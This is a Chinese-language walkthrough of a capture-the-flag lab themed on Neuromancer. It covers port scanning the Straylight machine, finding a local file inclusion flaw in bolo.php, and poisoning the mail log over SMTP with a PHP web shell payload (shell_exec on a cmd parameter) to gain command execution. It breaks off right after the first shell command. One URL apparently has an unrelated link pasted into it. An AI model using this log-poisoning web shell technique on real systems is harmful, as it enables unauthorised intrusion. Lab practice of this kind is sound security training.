靶机难度：中级（CTF）

靶机发布日期：2018年7月5日

靶机描述：一个新的OSCP风格实验室，涉及2台易受攻击的机器，以赛博朋克经典Neuromancer为主题-任何网络安全爱好者都必须阅读。该实验室利用了数据透视和后期开发，而我发现其他OSCP预处理实验室似乎缺乏。目标是在两台计算机上都扎根。您只需要默认的Kali Linux。

不会出现缓冲区溢出或漏洞利用的情况-使用小的单词列表就可以完成任何必要的密码破解。

Straylight-模拟带有2个NICS的面向公众的服务器。首先盖上此盖，然后转到最后一台机器。Neuromancer-在具有1个NIC的非公共网络中。你的Kali应该和Straylight在同一个虚拟网络上。

需要VirtualBox。VMware无法正确导入。

目标：得到root权限&找到flag.txt

作者：DRX嗯嗯呐

这次两台靶机，牛不牛，很期待。

开始！！！

VirtualBox环境配置

Kail网卡配置

Straylight靶机网卡配置

Neuromancer靶机网卡配置

测试环境

kail:192.168.56.3

Neuromancer靶机：10.0.2.8

Straylight靶机：192.168.56.8/10.0.2.10

Straylight靶机渗透

信息收集

nmap扫描靶机地址

按照提示，我们先搞Straylight靶机

nmap 端口扫描

25 smtp

80 http

3000? Apache Hadoop

Hadoop是Apache基金会开发的分布式系统基础架构,Hadoop主要被用来解决海量数据的存储和海量数据的分析计算。

25 端口使用smtp-user-enum未扫描出什么有用的账号

访问80端口

过一会出现一个新的js

通过dirb和nikto扫描只发现两个文件目录记录一下

http://192.168.56.4/manual/images/

http://192.168.56.4/manual/style/

但是都没有获得有用的信息

访问3000端口

靶机使用了ntopng

nikto扫描出一个反射型xss漏洞

但是利用反射xss漏洞无法获得shell只能暂时放着

查看网页源代码，发现flag敏感字眼

获得提示但是无法访问，但是没办法访问

使用admin用户可以登录

登录之后在访问

用strings打开也没有获得什么信息。

之后继续在登陆的界面查找有用信息，发现在FLOWS模块下记录访问目录

访问/turing-bolo/，说是从列表中选择一个人来查看他们的自定义活动日志

选择一个case用户提交

发现了其他三个用户的日志，看一看能不能访问

利用LFI漏洞获得shell

可以访问，直接修改bolo参数后面的值，测试是否存在本地文件包含漏洞

http://192.168.56.4/turing-bolo/bolo.php?bolo=https://www.freebuf.com/articles/turing-bolo/molly

看来bolo参数存在LFI漏洞，但是看这个情况是默认补充后缀.log，这样的话只能访问log文件，测试一下

因为靶机存在smtp服务，所以看一下/var/log/mail日志

现在我们可以看到了mail日志了，根据日志我们可以看到日志里包含了发件人和收件人信息。

利用思路如下：我们用smtp发邮件，将发件人或收件人写为木马，之后在利用LFI漏洞将mail包含到PHP界面，这样就可以执行木马，获得shell

HELO ROOT#向服务器标识用户身份

MAIL FROM: "ROOT <?php echo shell_exec($_GET['cmd']);?>" #MAIL FROM:发件人

RCPT TO:ROOT#RCPT TO:收件人

data#开始编辑邮件内容

.#输入点代表编辑结束

成功获得shell

http://192.168.56.8/turing-bolo/bolo.php?bolo=//var/log/mail&cmd=ls

<